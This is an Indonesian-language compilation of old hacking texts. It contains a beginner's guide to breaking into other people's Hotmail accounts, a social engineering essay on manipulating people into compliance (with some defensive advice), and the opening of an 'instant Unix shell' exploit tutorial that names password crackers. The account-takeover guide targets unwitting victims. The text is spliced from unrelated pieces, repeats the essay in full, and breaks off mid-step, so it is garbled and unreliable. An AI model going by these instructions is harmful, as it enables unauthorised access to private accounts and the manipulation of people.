Tulisan ini dibuat untuk para pemula, dan mereka lainnya yang selalu
pengen belajar. Ini nih mah gak buat yang udah pengalaman yang udah tau.
Kecuali emang lagi pengen baca. =-)
Artikel ini berisi informasi mengenai Hotmail free internet based e-mail dan
bagaiman untuk mendapatkan access ke semua account lainnya (Yah ... tidak
semua sih =-P ).
==================
==Latar Belakang==
==================
Hotmail adalah sebuah i-mil system berbasis web. Yang cgi-bin sebagai
sebuah gateway ke mesin-mesin lokal dimana semua password dan e-mail
di simpan.
Hotmail akan meminta kamu masukin login pada satu page dan password pada
page lainnya, Nah ini yang jadi kunci pertama dari metode buat nge'hack.
Ketika ada dalam account Hotmail, ada banyak pilihan, kayak reading mail,
deleting mail, dll
Nah pilihan terakhir adalah logout option, yang merupakan kunci kedua dari
metode nembus-in. Untuk itu kamu mesti tau user name dari subject/victim.
User name ini mah nama diawal tanda @ di alamat i-mil mereka, so
mudah aja didapat. Kamu juga musti make browser yang bisa nampilin source
code dari page yang sedang kamu liat. Yup, cuman itu yang dibutuhkan selain
subject nya mesti bloon bener, entah lupa pa gak peduli buat logout
sekali mereka udah masuk dalam system. Nah ini nih kunci buat
nge'hacknya!!!!!!
Pokoke gimana caranya supaya si-subject gak logout, terserah =-)
===========
==Caranye==
===========
Sekarang langkah-langkah buat nge-hacknya ......
//////////
langkah 1
/////////
Langkah pertama adalah untuk mendapatkan username dari 'subject'
trus buka web browser ke http://www.hotmail.com dan login dengan user name
itu.
Pasti-in kalo kamu udah bener nulis username soalnye hotmail gak bakalan
ngasih tauk kalo kamu ngisinya gak bener, Hotmail akan me-log IP dari orang
yang memasukkan nama login yang salah.
//////////
Langkah 2
/////////
Sekarang liat source code dari password page yang kamu masukin. Pada URL box
browser kamu bakalan keliatan seperti ini ->
www.hotmail.com/cgi-bin/password.cgi
Liat source codenya. Cari yang pada souce code page tersebut, yang kayak ini :
Social Engineering
Apakah social engineering itu?
Secara mendasar, social engineering adalah seni dan ilmu memaksa
orang untuk mematuhi harapan-harapan anda. Ia bukanlah suatu cara
untuk mengendalikan pikiran orang lain, ia tidak akan mengijinkan anda
untuk memaksa orang lain menunjukkan tugas-tugas secara liar di luar
tingkah laku normal mereka dan ini jauh dari hal-hal bodoh semacam itu.
Ia(Social engineering) juga melibatkan lebih dari sekedar berpikir cepat dan
sederhana dan suatu jenis aksen yang menyenangkan. Social engineering
bisa melibatkan banyak ‘kerja-kerja yang membumi,’ pengumpulan
informasi dan idle chi chat sebelum adanya usaha untuk mendapatkan
informasi yang pernah dibuat. Seperti hacking, sebagian besar kerjanya
masih dalam batas interpretasi, lebih dari sekedar usaha itu sendiri.
Anda mungkin berpikir pembicaraan ini mungkin kelihatan menjadi
suatu perminttaan maaf yang lemah untuk menunjukkan bagaimana teknikteknik
ini bisa digunakan untuk hacking. OK, cukup terbuka. Namun, satuhttp://
www.obscure.org/~betha/docs/
satunya cara untuk mempertahankan diri dari bentuk serangan keamanan
ini adalah dengan mengetahui metode apa yang mungkin digunakan.
Dengan pengetahuan ini sangatlah mungkin untuk memanfaatkan teknikteknik
yang digunakan baik terhadap diri anda maupun perusahaan anda
dan melindungi penerobosan keamanan illegal sebelum orang-orang lain
mendapatkan data yang anda simpan. Suatu gaya CERT tentang
kewaspadaan keamanan komputer dengan sedikit perincian kurang berarti
dalam kasus ini. Ia hanya akan mendinginkan beberapa orang yang mungkin
berusaha mendapatkan akses pada sistem anda dengan berpura-pura
beberapa hal adalah benar. Jangan biarkan mereka. Seperti biasanya, tak
ada bantuan apapun.
Lalu?
Social engineering berkonsentrasi pada link paling lemah dari alur
keamanan komputer. Seringkali dikatakan bahwa hanya komputer yang
paling aman adalah komputer yang unplugged. Fakta bahwa anda dapat
meyakinkan seseorang untuk masuk ke dalamnya dan menghidupkannya
berarti bahwa komputer yang kekuatannya menurunpun sangat rentan.
Juga, bagian yang manusiawi dari suatu penyetelan keamanan adalah
hal yang paling esensial. Ini berarti bahwa kelemahan keamanan ini bersifat
universal, independen dari platform, perangkat lunak, jaringan atau usia
perlengkapan.
Setiap orang dengan akses pada setiap bagian sistem, secara fisikal
maupun elektronik menjadi suatu resiko keamanan potensial. Informasi
apapun yang bisa diperoleh mungkin digunakan untuk informasi lebih jauh
tentang social engineering. Hal ini berarti bahkan orang-orang yang tiidak
dipertimbangkan sebagai bagian kebijakan bisa digunakan untuk
menyebabkan suatu terobosan keamanan.
http://www.obscure.org/~betha/docs/
Sebuah masalah besar?
Para profesional keamanan secara terus menerus diberitahu bahwa
keamanan melalui ketidakjelasan adalah keamanan yang paling lemah.
Tidaklah mungkin mengaburkan fakta bahwa manusia menggunakan sistem
atau bahwa mereka bisa mempengaruhinya, karena sebagaimana yang saya
katakan sebelumnya, tidak ada satu sistem komputerpun di muka bumi ini
yang tidak melibatkan manusia sebagai salah satu bagiannya.
Hampir setiap manusia memiliki perangkat kerja untuk mengatasi
‘serangan’ social engineering, satu-satunya perbedaan adalah dalam hal
jumlah skill yang digunakan ketika menggunakan perangkat kerja ini.
Metode-metode
Berusaha mengendalikan seorang individu guna melengkapi tugasnya
bisa menggunakan beberapa metode. Metode yang pertama dan yang paling
jelas adalah suatu permintaan langsung yang sederhana, dimana seorang
individu diminta untuk melengkapi tugasnya secara langsung. Walaupun
sedikit kemungkinan berhasilnya, ini merupakan metode yang paling mudah
dan paling langsung. Secara pasti individu tahu apa yang dinginkan oleh
anda dari mereka.
Yang kedua adalah dengan menciptakan suatu siituasi yang telah
dirancang dimana secara sederhana individu menjadi bagian dari situasi
tersebut. Dengan kelebihan faktor dari yang anda minta pertimbangkan
untuk diperhatikan, individu jauh lebih mungkin untuk diyakinkan, karena
anda bisa menciptakan alasan-alasan untuk kepatuhan mereka daripada
alasan-alasan personal lainnya, dan hampir pasti melibatkan pengetahuan
ekstensif yang diperoleh dari target yang diinginkan. Yang sedikit belum
tentu lebih baik.
Salah satu perangkat kerja esensial yang digunakan untuk social
engineering adalah suatu daya ingat yang baik bagi fakta-fakta yang
http://www.obscure.org/~betha/docs/
dikumpulkan. Ini adalah sesuatu yang cenderung dilebih-lebihkan oleh para
hacker dan sysadmin, khususnya ketika sampai pada fakta yang berkaitan
dengan bidang mereka. Untuk menggambarkan hal ini saya akan
menunjukkan sebuah demonstrasi kecil.....
[Demonstrasinya di sini. Secara mendasar, hal ini menunjukkan
bahwa dengan tekanan-tekanan sosial seorang individu akan menyesuaikan
diri pada suatu keputusan kelompok, bahkan sekalipun ia tahu kalau hal itu
jelas-jelas pilihan yang salah.]
Konformitas
Bahkan dalam kasus-kasus dimana seseorang yakin mereka benar
sangat mungkin mereka bertindak dalam cara-cara yang berbeda. Jika saya
sekedar bertanya orang terakhir tentang tindakan mereka sendiri apakah
kata pertengahan yang akan mereka berikan pada saya jawaban yang benar
dan tak jadi soal berapa kali saya berusaha meyakinkan mereka mereka
mungkin tidak akan merubah pendirian mereka.
Namun, setting kelompok ini merupakan suatu situasi yang benarbenar
berbeda. Situasi ini memiliki apa yang oleh para ahli psikologi
dinamakan karakteristik tuntutan, yaitu situasi ini memiliki suatu
ketegangan-ketegangan sosial yang kuat tentang bagaimana partisipan
seharusnya bertindak. Tidak berharap untuk menyerang orang lain, tidak
ingin kelihatan dozy di hadapan sejumlah besar audiens dan tidak
merongrong pandangan-pandangan orang lain semua partisipan yang baik
mengarah pada suatu keputusan untuk ikut arus. Menggunakan situasisituasi
dengan karakteristik ini adalah suatu cara paling efektif untuk
mengarahkan tingkah laku orang.
http://www.obscure.org/~betha/docs/
Situasi
Namun, sebagian besar social engineering dilakukan oleh individu –
individu penyendiri dan begitu juga tekanan sosial dan faktor-faktor
berpengaruh lainnya harus dipertimbangkan dengan menciptakan suatu
situasi yang bisa dipercayai dimana target merasa terlibat.
Jika situasinya, riil atau imajiner memiliki karakteristik-karakteristik
tertentu maka target individualnya lebih mungkin mematuhi permintaan
anda. Karakteristik ini termasuk:
-Pembagian tanggungjawab dari individu-individu target. Hal ini
ketika individu mempercayai bahwa mereka tidak bertanggungjawab sendiri
atas tindakan-tindakan mereka.
-Sebuah kesempatan untuk menjilat. Kepatuhan lebih mungkin jika
individu percaya bahwa dengan memtahui mereka menjilat pada seseorang
yang mungkin memeberikan mereka manfaat-manfaat masa depan. Secara
mendasar hal ini berarti patuh dengan bosnya.
Kewajiban moral. Ini adalah alasan dimana seorang individu patuh
karena mereka merasa ini adalah kewajiban moral mereka. Bagian dari hal
ini adalah rasa bersalah. Orang memilih menghindari perasaan beralah dan
sehingga jika terdapat suatu kesempatan dimana mereka akan merasa
kesalahan yang akan mereka lakukan jika menghindari outcome ini.
Persuasi personal
Pada suatu level personal terdapat metode-metode yang digunakan
untuk memaksa seseorang lebih mungkin bekerjsama dengan anda. Tujuan
persuasi personal adalah tidak memaksa orang untuk melengkapi tugastugas
anda, namun mendorong kepatuhan sukarela mereka dengan
permintaan anda.
http://www.obscure.org/~betha/docs/
Terdapat perbedaan halus. Secara mendasar, targetnya secara
mudahnya diarahkan pada jalan-jalan yang kita inginkan. Sasaran percaya
bahwa mereka memiliki kontrol atas situasi, dan bahwa mereka
mendayagunakan kekuatan mereka untuk membantu anda.
Fakta bahwa manfaat yang akan diperoleh seseorang dari membantu
anda telah telah terbukti tidak relevan. Sasaran kita percaya mereka
membuat suatu keputusan yang beralasan untuk mempertukarkan manfaatmanfaat
ini dengan sedikit energi dan waktu yang hilang.
Kerjasama
Terdapat beberapa faktor, yang jika ada akan meningkatkan
kesempatan suatu sasaran beroperasi dengan seorang social engineer.
Mengurangi konflik dengan sasaran adalah lebih baik. Kerjasama
akan dengan lebih siiap diperoleh ketika pendekatan lembut digunakan.
Pulling rank(atau ranking yang diinginkan), kebosanan atau aturan-aturan
jarang bekerja bagi pemaksaan efektif.
Faktor ‘kaki di dalam pintu’ adalah dimana fokus sebuah persuasi
berusaha sudah tahu siapa anda atau telah memiliki pengalaman
berhubungan dengan anda. Ini merupakan suatu cara khusus yang efektif
dan telah diketahui oleh con men sebagai trik-trik percaya diri. Penelitian
psikologis memperlihatkan bahwa orang-orang lebih mungkin mematuhi
kita dengan suatu permintaan jika mereka sebelumnya telah dipatuhi pada
sesuatu yang jauh lebih kecil. Jika ‘kaki di dalam pintu’ ini termasuk sejarah
kerjasama, dimana hal-hal telah berlalu dengan baik-baik saja di masa lalu,
maka kesempatan kerjasama akan meningkat.
Informasi yang lebih sensoris suatu target yang diperoleh seorang
social engineer akan lebih baik. Ini secara khusus kedengaran dan kelihatan
benar, anda lebih mungkin dipercayai jika sasaran bisa melihat dan
mendengar anda daripada jika mereka hanya mendengar suara anda dari
http://www.obscure.org/~betha/docs/
seberang telepon. Secara tak mengejutkan komunikasi teks ASCII tidak
begitu memberikan manfaat bagi persuasi. Sangatlah mudah untuk menolak
seseorang lewat gaya obrolan di IRC.
Keterlibatan
Namun, suskses tidak bergantung terlalu banyak pada bagaimana
seseorang yang terlibat sedang menjalankan apa yang anda minta. Kita
dapat katakan administrator sistem, pejabat keamanan komputer, teknisi
dan orang-orang yang menggantungkan diri ppada sistem untuk perangkat
kerja-kerja atau komunikasi esensial sangat terlibat dalam seranganserangan
social engineering oleh para hacker.
Orang-orang yang sangat terlibat lebih baik diiyakinkan dengan suatu
argumen yang kuat. Dalam kenyataannya, semakin lebih kuat argumen yang
anda berikan pada mereka akan lebih baik. Yang mengejutkan, tidaklah
sama untuk kasus argumen-argumen lemah. Seseorang yang sangat terlibat
dalam suatu usaha persuasi kurang mungkin diyakinkan jika anda
memberikan mereka argumen lemah. Ketika seseorang mungkin diarahkan
secara langsung dengan suatu usaha social engineering, argumen lemah
cenderung menghasilkan counter argumen dalam kepala sasaran kita.
Maaka untuk orang-orang yang sangat terlibat, aturannya adalah semakin
kuat argumen, argumen yang lemah akan berkurang.
Orang-orang digolongkan sedikit terlibat jika mereka memiliki sedikit
kepentingan dalam apa yang anda minta pada mereka untuk dilakukan.
Contoh-contoh relevan bisa jadi penjaga keamanan, tukang bersih-bersih,
atau resepsionis di tempat sistem komputer. Karena orang-orang yang
sedikit terlibat tidak mungkin dipengaruhi secara langsung dengan suatu
permintaan, mereka cenderung tidak mengganggu penganalisaan pro-kontra
lelucon persuasif. Walaupun sifatnya umum bagi sebuah keputusan untuk
setuju dengan permintaanmu atau tidak dipaksa berdasarkan informasi lain.
http://www.obscure.org/~betha/docs/
Informasi semacam itu bisa jadi sejumlah alasan yang diberikan oleh social
engineer belaka, urgensi permintaan yang lebih jelas atau status orang yang
berusaha meyakinkan. Aturan intinya di sini adalah semata-mata semakin
lebih baik argumen akan semakin baik. Secara mendasar, orang-orang yang
tidak dilibatkan dalam apa yang berusaha didapatkan oleh social engineer
akan lebih diyakinkan dengan banyaknya argumen atau permohonan
dariada berapapun relevannya mereka.
Salah satu poin penting yang patut dicatat adalah bahwa orang yang
kurang kompeten lebih mungkin mengikuti model yang lebih kompeten.
Dalam kasus sistem komputer ini mungkin bisa dimasukkan dalam golongan
orang yang sedikit terlibat. Inti moral point ini adalah, jangan berusaha
meyakinkan administrator sistem social engineer, kecuali mereka kurang
kompeten dibandingkan anda, dan yang seperti kita semua ketahui, itu tidak
mungkin.
Mengamankan dari serangan-serangan manusia
Dengan semua informasi ini bagaimana seseorang akan menciptakan
sistem komputer mereka lebih aman? Langkah pertama yang baik adalah
menciptakan bagian keamanan komputer dari pekerjaan setiap orang
apakah mereka menggunakan komputer atau tidak. Hal ini tidak hanya akan
mendorong status yang dibayangkan mereka sendiri dengan tiadanya biaya
ekstra bagi anda namun akan memaksa staf menjadi lebih waspada.
Namun pertahaan terbaik terhadap hal ini, sebagaimana berbagai hal
lainnya, adalah pendidikan. Menjelaskan pada para pekerja tentang arti
pentingnya sistem keamanan komputer dan bahwa ada orang yang
dipersiapkan untuk berusaha dan memanipulasi mereka guna mendapatkan
akses adalah sebuah tahap pertama yang efektif dan bijaksana.
Memperingatkan orang tentang kemungkinan-kemungkinan serangan
seringkali cukup membuat mereka waspada. Ingat, kisahkan dua sisi cerita
http://www.obscure.org/~betha/docs/
ketika mendidik orang lain tentang keamanan komputer. Ini tidak hanya
bias personal saya. Ketika individu tahu dua sisi dari satu argumen mereka
kurang mungkin untuk dibohongi dari posisi-posisi pilihan mereka. Dan jika
mereka terlibat dalam sistem keamanan komputer, posisi pilihan mereka
mungkin berada pada sisi mengamankan data anda.
Terdapat atribut-atribut dimana orang mungkin cenderung kurang
mematuhi persuasi yang kita berikan. Orang-orang yang kurang patuh
cenderung sangat cerdas, sangat orisinal, mampu mengatasi ketegangan dan
memiliki kepercayaan diri yang cukup beralasan. Manajemen ketegangan
dan kepercayaan diri bisa diajarkan atau didorong. Bentuk-bentuk
penegasan diri seringkali digunakan untuk pekerja manajemen, latihan ini
sangat berguna dalam mengurangi kesempatan seorang individu yang secara
sosial ahli, seperti halnya memiliki banyak manfaat lainnya.
Apa yang sebenarnya ingin kita sampaikan adalah membuat orang
sadar dan terlibat dalam kebijakan keamanan anda. Ini memerlukan sedikit
usaha dan memberikan balasan yang besar dalam pengertian jumlah resiko
reduksi.
Kesimpulan
Berlawanan dengan kepercayaan populer, seringkali lebih mudah
menghack orang daripada mengirimkan email. Namun ia kurang memiliki
usaha guna mendapatkan pekerja yang bisa melindungi dan mendeteksi
usaha-usaha pada social engineering daripada mengamankan sistem unix
apapun.
Para administrator sistem, jangan biarkan orang yang me-link jalur
keamanan anda membuat kerja keras anda terbuang sia-sia. Dan para
hacker, jangan biarkan para administrator sistem berleha-leha dengan linklink
yang lemah, karena jalur-jalur merekalah yang menyimpan data anda.
referensi :
http://www.obscure.org/~betha/docs/
Secara mendasar, social engineering adalah seni dan ilmu memaksa
orang untuk mematuhi harapan-harapan anda. Ia bukanlah suatu cara
untuk mengendalikan pikiran orang lain, ia tidak akan mengijinkan anda
untuk memaksa orang lain menunjukkan tugas-tugas secara liar di luar
tingkah laku normal mereka dan ini jauh dari hal-hal bodoh semacam itu.
Ia(Social engineering) juga melibatkan lebih dari sekedar berpikir cepat dan
sederhana dan suatu jenis aksen yang menyenangkan. Social engineering
bisa melibatkan banyak ‘kerja-kerja yang membumi,’ pengumpulan
informasi dan idle chi chat sebelum adanya usaha untuk mendapatkan
informasi yang pernah dibuat. Seperti hacking, sebagian besar kerjanya
masih dalam batas interpretasi, lebih dari sekedar usaha itu sendiri.
Anda mungkin berpikir pembicaraan ini mungkin kelihatan menjadi
suatu perminttaan maaf yang lemah untuk menunjukkan bagaimana teknikteknik
ini bisa digunakan untuk hacking. OK, cukup terbuka. Namun, satuhttp://
www.obscure.org/~betha/docs/
satunya cara untuk mempertahankan diri dari bentuk serangan keamanan
ini adalah dengan mengetahui metode apa yang mungkin digunakan.
Dengan pengetahuan ini sangatlah mungkin untuk memanfaatkan teknikteknik
yang digunakan baik terhadap diri anda maupun perusahaan anda
dan melindungi penerobosan keamanan illegal sebelum orang-orang lain
mendapatkan data yang anda simpan. Suatu gaya CERT tentang
kewaspadaan keamanan komputer dengan sedikit perincian kurang berarti
dalam kasus ini. Ia hanya akan mendinginkan beberapa orang yang mungkin
berusaha mendapatkan akses pada sistem anda dengan berpura-pura
beberapa hal adalah benar. Jangan biarkan mereka. Seperti biasanya, tak
ada bantuan apapun.
Lalu?
Social engineering berkonsentrasi pada link paling lemah dari alur
keamanan komputer. Seringkali dikatakan bahwa hanya komputer yang
paling aman adalah komputer yang unplugged. Fakta bahwa anda dapat
meyakinkan seseorang untuk masuk ke dalamnya dan menghidupkannya
berarti bahwa komputer yang kekuatannya menurunpun sangat rentan.
Juga, bagian yang manusiawi dari suatu penyetelan keamanan adalah
hal yang paling esensial. Ini berarti bahwa kelemahan keamanan ini bersifat
universal, independen dari platform, perangkat lunak, jaringan atau usia
perlengkapan.
Setiap orang dengan akses pada setiap bagian sistem, secara fisikal
maupun elektronik menjadi suatu resiko keamanan potensial. Informasi
apapun yang bisa diperoleh mungkin digunakan untuk informasi lebih jauh
tentang social engineering. Hal ini berarti bahkan orang-orang yang tiidak
dipertimbangkan sebagai bagian kebijakan bisa digunakan untuk
menyebabkan suatu terobosan keamanan.
http://www.obscure.org/~betha/docs/
Sebuah masalah besar?
Para profesional keamanan secara terus menerus diberitahu bahwa
keamanan melalui ketidakjelasan adalah keamanan yang paling lemah.
Tidaklah mungkin mengaburkan fakta bahwa manusia menggunakan sistem
atau bahwa mereka bisa mempengaruhinya, karena sebagaimana yang saya
katakan sebelumnya, tidak ada satu sistem komputerpun di muka bumi ini
yang tidak melibatkan manusia sebagai salah satu bagiannya.
Hampir setiap manusia memiliki perangkat kerja untuk mengatasi
‘serangan’ social engineering, satu-satunya perbedaan adalah dalam hal
jumlah skill yang digunakan ketika menggunakan perangkat kerja ini.
Metode-metode
Berusaha mengendalikan seorang individu guna melengkapi tugasnya
bisa menggunakan beberapa metode. Metode yang pertama dan yang paling
jelas adalah suatu permintaan langsung yang sederhana, dimana seorang
individu diminta untuk melengkapi tugasnya secara langsung. Walaupun
sedikit kemungkinan berhasilnya, ini merupakan metode yang paling mudah
dan paling langsung. Secara pasti individu tahu apa yang dinginkan oleh
anda dari mereka.
Yang kedua adalah dengan menciptakan suatu siituasi yang telah
dirancang dimana secara sederhana individu menjadi bagian dari situasi
tersebut. Dengan kelebihan faktor dari yang anda minta pertimbangkan
untuk diperhatikan, individu jauh lebih mungkin untuk diyakinkan, karena
anda bisa menciptakan alasan-alasan untuk kepatuhan mereka daripada
alasan-alasan personal lainnya, dan hampir pasti melibatkan pengetahuan
ekstensif yang diperoleh dari target yang diinginkan. Yang sedikit belum
tentu lebih baik.
Salah satu perangkat kerja esensial yang digunakan untuk social
engineering adalah suatu daya ingat yang baik bagi fakta-fakta yang
http://www.obscure.org/~betha/docs/
dikumpulkan. Ini adalah sesuatu yang cenderung dilebih-lebihkan oleh para
hacker dan sysadmin, khususnya ketika sampai pada fakta yang berkaitan
dengan bidang mereka. Untuk menggambarkan hal ini saya akan
menunjukkan sebuah demonstrasi kecil.....
[Demonstrasinya di sini. Secara mendasar, hal ini menunjukkan
bahwa dengan tekanan-tekanan sosial seorang individu akan menyesuaikan
diri pada suatu keputusan kelompok, bahkan sekalipun ia tahu kalau hal itu
jelas-jelas pilihan yang salah.]
Konformitas
Bahkan dalam kasus-kasus dimana seseorang yakin mereka benar
sangat mungkin mereka bertindak dalam cara-cara yang berbeda. Jika saya
sekedar bertanya orang terakhir tentang tindakan mereka sendiri apakah
kata pertengahan yang akan mereka berikan pada saya jawaban yang benar
dan tak jadi soal berapa kali saya berusaha meyakinkan mereka mereka
mungkin tidak akan merubah pendirian mereka.
Namun, setting kelompok ini merupakan suatu situasi yang benarbenar
berbeda. Situasi ini memiliki apa yang oleh para ahli psikologi
dinamakan karakteristik tuntutan, yaitu situasi ini memiliki suatu
ketegangan-ketegangan sosial yang kuat tentang bagaimana partisipan
seharusnya bertindak. Tidak berharap untuk menyerang orang lain, tidak
ingin kelihatan dozy di hadapan sejumlah besar audiens dan tidak
merongrong pandangan-pandangan orang lain semua partisipan yang baik
mengarah pada suatu keputusan untuk ikut arus. Menggunakan situasisituasi
dengan karakteristik ini adalah suatu cara paling efektif untuk
mengarahkan tingkah laku orang.
http://www.obscure.org/~betha/docs/
Situasi
Namun, sebagian besar social engineering dilakukan oleh individu –
individu penyendiri dan begitu juga tekanan sosial dan faktor-faktor
berpengaruh lainnya harus dipertimbangkan dengan menciptakan suatu
situasi yang bisa dipercayai dimana target merasa terlibat.
Jika situasinya, riil atau imajiner memiliki karakteristik-karakteristik
tertentu maka target individualnya lebih mungkin mematuhi permintaan
anda. Karakteristik ini termasuk:
-Pembagian tanggungjawab dari individu-individu target. Hal ini
ketika individu mempercayai bahwa mereka tidak bertanggungjawab sendiri
atas tindakan-tindakan mereka.
-Sebuah kesempatan untuk menjilat. Kepatuhan lebih mungkin jika
individu percaya bahwa dengan memtahui mereka menjilat pada seseorang
yang mungkin memeberikan mereka manfaat-manfaat masa depan. Secara
mendasar hal ini berarti patuh dengan bosnya.
Kewajiban moral. Ini adalah alasan dimana seorang individu patuh
karena mereka merasa ini adalah kewajiban moral mereka. Bagian dari hal
ini adalah rasa bersalah. Orang memilih menghindari perasaan beralah dan
sehingga jika terdapat suatu kesempatan dimana mereka akan merasa
kesalahan yang akan mereka lakukan jika menghindari outcome ini.
Persuasi personal
Pada suatu level personal terdapat metode-metode yang digunakan
untuk memaksa seseorang lebih mungkin bekerjsama dengan anda. Tujuan
persuasi personal adalah tidak memaksa orang untuk melengkapi tugastugas
anda, namun mendorong kepatuhan sukarela mereka dengan
permintaan anda.
http://www.obscure.org/~betha/docs/
Terdapat perbedaan halus. Secara mendasar, targetnya secara
mudahnya diarahkan pada jalan-jalan yang kita inginkan. Sasaran percaya
bahwa mereka memiliki kontrol atas situasi, dan bahwa mereka
mendayagunakan kekuatan mereka untuk membantu anda.
Fakta bahwa manfaat yang akan diperoleh seseorang dari membantu
anda telah telah terbukti tidak relevan. Sasaran kita percaya mereka
membuat suatu keputusan yang beralasan untuk mempertukarkan manfaatmanfaat
ini dengan sedikit energi dan waktu yang hilang.
Kerjasama
Terdapat beberapa faktor, yang jika ada akan meningkatkan
kesempatan suatu sasaran beroperasi dengan seorang social engineer.
Mengurangi konflik dengan sasaran adalah lebih baik. Kerjasama
akan dengan lebih siiap diperoleh ketika pendekatan lembut digunakan.
Pulling rank(atau ranking yang diinginkan), kebosanan atau aturan-aturan
jarang bekerja bagi pemaksaan efektif.
Faktor ‘kaki di dalam pintu’ adalah dimana fokus sebuah persuasi
berusaha sudah tahu siapa anda atau telah memiliki pengalaman
berhubungan dengan anda. Ini merupakan suatu cara khusus yang efektif
dan telah diketahui oleh con men sebagai trik-trik percaya diri. Penelitian
psikologis memperlihatkan bahwa orang-orang lebih mungkin mematuhi
kita dengan suatu permintaan jika mereka sebelumnya telah dipatuhi pada
sesuatu yang jauh lebih kecil. Jika ‘kaki di dalam pintu’ ini termasuk sejarah
kerjasama, dimana hal-hal telah berlalu dengan baik-baik saja di masa lalu,
maka kesempatan kerjasama akan meningkat.
Informasi yang lebih sensoris suatu target yang diperoleh seorang
social engineer akan lebih baik. Ini secara khusus kedengaran dan kelihatan
benar, anda lebih mungkin dipercayai jika sasaran bisa melihat dan
mendengar anda daripada jika mereka hanya mendengar suara anda dari
http://www.obscure.org/~betha/docs/
seberang telepon. Secara tak mengejutkan komunikasi teks ASCII tidak
begitu memberikan manfaat bagi persuasi. Sangatlah mudah untuk menolak
seseorang lewat gaya obrolan di IRC.
Keterlibatan
Namun, suskses tidak bergantung terlalu banyak pada bagaimana
seseorang yang terlibat sedang menjalankan apa yang anda minta. Kita
dapat katakan administrator sistem, pejabat keamanan komputer, teknisi
dan orang-orang yang menggantungkan diri ppada sistem untuk perangkat
kerja-kerja atau komunikasi esensial sangat terlibat dalam seranganserangan
social engineering oleh para hacker.
Orang-orang yang sangat terlibat lebih baik diiyakinkan dengan suatu
argumen yang kuat. Dalam kenyataannya, semakin lebih kuat argumen yang
anda berikan pada mereka akan lebih baik. Yang mengejutkan, tidaklah
sama untuk kasus argumen-argumen lemah. Seseorang yang sangat terlibat
dalam suatu usaha persuasi kurang mungkin diyakinkan jika anda
memberikan mereka argumen lemah. Ketika seseorang mungkin diarahkan
secara langsung dengan suatu usaha social engineering, argumen lemah
cenderung menghasilkan counter argumen dalam kepala sasaran kita.
Maaka untuk orang-orang yang sangat terlibat, aturannya adalah semakin
kuat argumen, argumen yang lemah akan berkurang.
Orang-orang digolongkan sedikit terlibat jika mereka memiliki sedikit
kepentingan dalam apa yang anda minta pada mereka untuk dilakukan.
Contoh-contoh relevan bisa jadi penjaga keamanan, tukang bersih-bersih,
atau resepsionis di tempat sistem komputer. Karena orang-orang yang
sedikit terlibat tidak mungkin dipengaruhi secara langsung dengan suatu
permintaan, mereka cenderung tidak mengganggu penganalisaan pro-kontra
lelucon persuasif. Walaupun sifatnya umum bagi sebuah keputusan untuk
setuju dengan permintaanmu atau tidak dipaksa berdasarkan informasi lain.
http://www.obscure.org/~betha/docs/
Informasi semacam itu bisa jadi sejumlah alasan yang diberikan oleh social
engineer belaka, urgensi permintaan yang lebih jelas atau status orang yang
berusaha meyakinkan. Aturan intinya di sini adalah semata-mata semakin
lebih baik argumen akan semakin baik. Secara mendasar, orang-orang yang
tidak dilibatkan dalam apa yang berusaha didapatkan oleh social engineer
akan lebih diyakinkan dengan banyaknya argumen atau permohonan
dariada berapapun relevannya mereka.
Salah satu poin penting yang patut dicatat adalah bahwa orang yang
kurang kompeten lebih mungkin mengikuti model yang lebih kompeten.
Dalam kasus sistem komputer ini mungkin bisa dimasukkan dalam golongan
orang yang sedikit terlibat. Inti moral point ini adalah, jangan berusaha
meyakinkan administrator sistem social engineer, kecuali mereka kurang
kompeten dibandingkan anda, dan yang seperti kita semua ketahui, itu tidak
mungkin.
Mengamankan dari serangan-serangan manusia
Dengan semua informasi ini bagaimana seseorang akan menciptakan
sistem komputer mereka lebih aman? Langkah pertama yang baik adalah
menciptakan bagian keamanan komputer dari pekerjaan setiap orang
apakah mereka menggunakan komputer atau tidak. Hal ini tidak hanya akan
mendorong status yang dibayangkan mereka sendiri dengan tiadanya biaya
ekstra bagi anda namun akan memaksa staf menjadi lebih waspada.
Namun pertahaan terbaik terhadap hal ini, sebagaimana berbagai hal
lainnya, adalah pendidikan. Menjelaskan pada para pekerja tentang arti
pentingnya sistem keamanan komputer dan bahwa ada orang yang
dipersiapkan untuk berusaha dan memanipulasi mereka guna mendapatkan
akses adalah sebuah tahap pertama yang efektif dan bijaksana.
Memperingatkan orang tentang kemungkinan-kemungkinan serangan
seringkali cukup membuat mereka waspada. Ingat, kisahkan dua sisi cerita
http://www.obscure.org/~betha/docs/
ketika mendidik orang lain tentang keamanan komputer. Ini tidak hanya
bias personal saya. Ketika individu tahu dua sisi dari satu argumen mereka
kurang mungkin untuk dibohongi dari posisi-posisi pilihan mereka. Dan jika
mereka terlibat dalam sistem keamanan komputer, posisi pilihan mereka
mungkin berada pada sisi mengamankan data anda.
Terdapat atribut-atribut dimana orang mungkin cenderung kurang
mematuhi persuasi yang kita berikan. Orang-orang yang kurang patuh
cenderung sangat cerdas, sangat orisinal, mampu mengatasi ketegangan dan
memiliki kepercayaan diri yang cukup beralasan. Manajemen ketegangan
dan kepercayaan diri bisa diajarkan atau didorong. Bentuk-bentuk
penegasan diri seringkali digunakan untuk pekerja manajemen, latihan ini
sangat berguna dalam mengurangi kesempatan seorang individu yang secara
sosial ahli, seperti halnya memiliki banyak manfaat lainnya.
Apa yang sebenarnya ingin kita sampaikan adalah membuat orang
sadar dan terlibat dalam kebijakan keamanan anda. Ini memerlukan sedikit
usaha dan memberikan balasan yang besar dalam pengertian jumlah resiko
reduksi.
Kesimpulan
Berlawanan dengan kepercayaan populer, seringkali lebih mudah
menghack orang daripada mengirimkan email. Namun ia kurang memiliki
usaha guna mendapatkan pekerja yang bisa melindungi dan mendeteksi
usaha-usaha pada social engineering daripada mengamankan sistem unix
apapun.
Para administrator sistem, jangan biarkan orang yang me-link jalur
keamanan anda membuat kerja keras anda terbuang sia-sia. Dan para
hacker, jangan biarkan para administrator sistem berleha-leha dengan linklink
yang lemah, karena jalur-jalur merekalah yang menyimpan data anda.
referensi :
http://www.obscure.org/~betha/docs/
Remote Exploit
=================================================================================
INSTANT SHELL UNIX
Oleh: LithErr - LithiumError (Kecoak Elektronik)
=================================================================================
Berikut adalah cara mendapatkan shell unix dalam waktu cepat buat kamu yang pingin belajar
sambil praktek tapi nggak mampu beli/install UNIX dengan memanfaatkan eksploit yang udah
cukup uzur cuman masih lumayan ampuh.
Bahan-bahan yang diperlukan:
- Web Browser (Netscape 3.0 disarankan karena cepat)
- Program Cracker (gunakan crackerjack atau star cracker)
